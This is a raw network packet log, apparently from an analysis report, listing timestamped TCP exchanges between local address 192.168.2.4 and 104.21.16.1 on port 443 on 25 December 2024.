                                                                                                                                  Dec 25, 2024 15:09:11.856630087 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.856952906 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.858403921 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.859558105 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.894776106 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.895420074 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.896140099 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.896358967 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.897835970 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.897931099 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.898737907 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.898804903 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.900844097 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.901067972 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.903774023 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.903872967 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.903893948 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.904119015 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.906158924 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.906308889 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.907845020 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.908149958 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.910244942 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.910376072 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.912621021 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.912694931 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.913379908 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.914762974 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.915139914 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.915209055 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.917359114 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.917443037 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.920177937 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.920365095 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.920381069 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.920517921 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.921855927 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.921991110 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.923346996 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.923463106 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.924254894 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.924339056 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.999450922 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.999500990 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.999557972 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.999592066 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.999622107 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.039880037 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.049065113 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.049083948 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.050292015 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.050326109 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.050334930 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.050364017 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.050560951 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.087737083 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.087830067 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.090167046 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.091253996 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.092606068 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.092736006 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.093465090 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.093540907 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.095029116 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.095148087 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.095726013 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.096318007 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.097268105 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.097340107 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.102133989 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.102171898 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.102236986 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.102236986 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.102262974 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.102370977 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.104592085 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.105010986 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.105027914 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.107718945 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.107837915 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.107853889 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.109268904 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.109440088 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.109455109 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.110205889 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.110426903 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.110441923 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.110522032 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.116763115 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.116991043 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.117026091 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.117042065 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.117805958 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.117840052 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.117856026 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.117913961 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.119498968 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.119570017 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.121072054 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.121321917 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.122682095 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.122824907 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.123547077 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.123826027 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.191729069 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.192102909 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.192604065 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.192707062 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.194232941 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.194463968 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.241446018 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.241580963 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.241594076 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.241898060 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.278928995 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.279063940 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.279397011 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.279490948 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.280165911 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.280250072 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.281634092 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.281749010 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.281774044 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.281853914 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.284115076 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.284212112 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.285867929 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.285957098 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.286916018 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.287005901 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.289812088 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.290000916 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.290026903 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.294588089 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.294610977 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.294642925 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.294658899 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.294686079 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.300241947 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.300263882 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.300304890 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.300321102 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.300345898 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.309200048 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.309220076 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.309300900 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.309300900 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.309319019 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.309441090 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.309489012 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.309545994 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.311099052 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.311218977 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.314296007 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.314435005 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.314449072 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.314522982 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.383773088 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.383872986 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.383899927 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.430521011 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.433537960 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.433562040 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.433665991 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.433665991 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.433681011 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.433882952 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.434350014 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.434469938 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.472290993 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.472419977 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.472435951 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.475630999 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.475670099 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.475776911 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.475794077 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.475900888 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.478616953 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.479289055 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.479302883 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.481412888 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.481528044 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.481544018 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.483112097 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.483186960 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.483196020 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.485130072 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.485920906 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.485937119 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.486040115 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.487526894 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.487647057 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.487653971 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.490788937 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.490828991 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.490904093 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.490904093 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.490917921 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.494710922 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.495382071 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.495424032 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.495436907 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.495461941 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.496001005 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.496787071 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.496895075 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.503626108 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.503839970 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.503853083 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.503912926 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.506994009 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.507087946 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.507107973 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.555511951 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.575988054 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.576179028 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.576189995 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.578907967 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.578948975 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.578982115 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.578990936 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.579423904 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.625699043 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.625766993 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.625778913 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.666203022 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.666224957 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.666275978 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.666294098 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.666321039 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.670195103 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.670231104 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.670249939 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.670258999 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.670285940 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.670300007 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.675843000 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.675867081 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.675905943 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.675913095 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.675940990 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.675960064 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.681149960 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.681174040 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.681216002 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.681222916 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.681260109 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.681292057 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.683969975 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.684005022 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.684043884 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.684051991 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.684089899 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.684720039 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.684772015 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.687820911 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.687889099 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.687896013 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.696698904 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.696727037 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.696758032 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.696764946 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.696813107 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.768378973 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.768415928 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.768450975 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.768465996 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.768482924 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.768508911 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.817781925 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.817811966 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.817853928 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.817864895 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.817898989 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.817918062 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.858478069 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.858500957 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.858546972 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.858557940 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.858580112 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.858597994 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.863378048 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.863401890 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.863439083 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.863446951 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.863473892 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.863487959 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.868993044 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.869014978 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.869054079 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.869060040 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.869100094 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.869118929 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.874579906 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.874604940 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.874666929 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.874675035 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.874687910 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.874710083 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.880184889 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.880208015 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.880249977 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.880255938 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:12.880283117 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.880301952 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:12.888978004 CET44349734104.21.16.1192.168.2.4
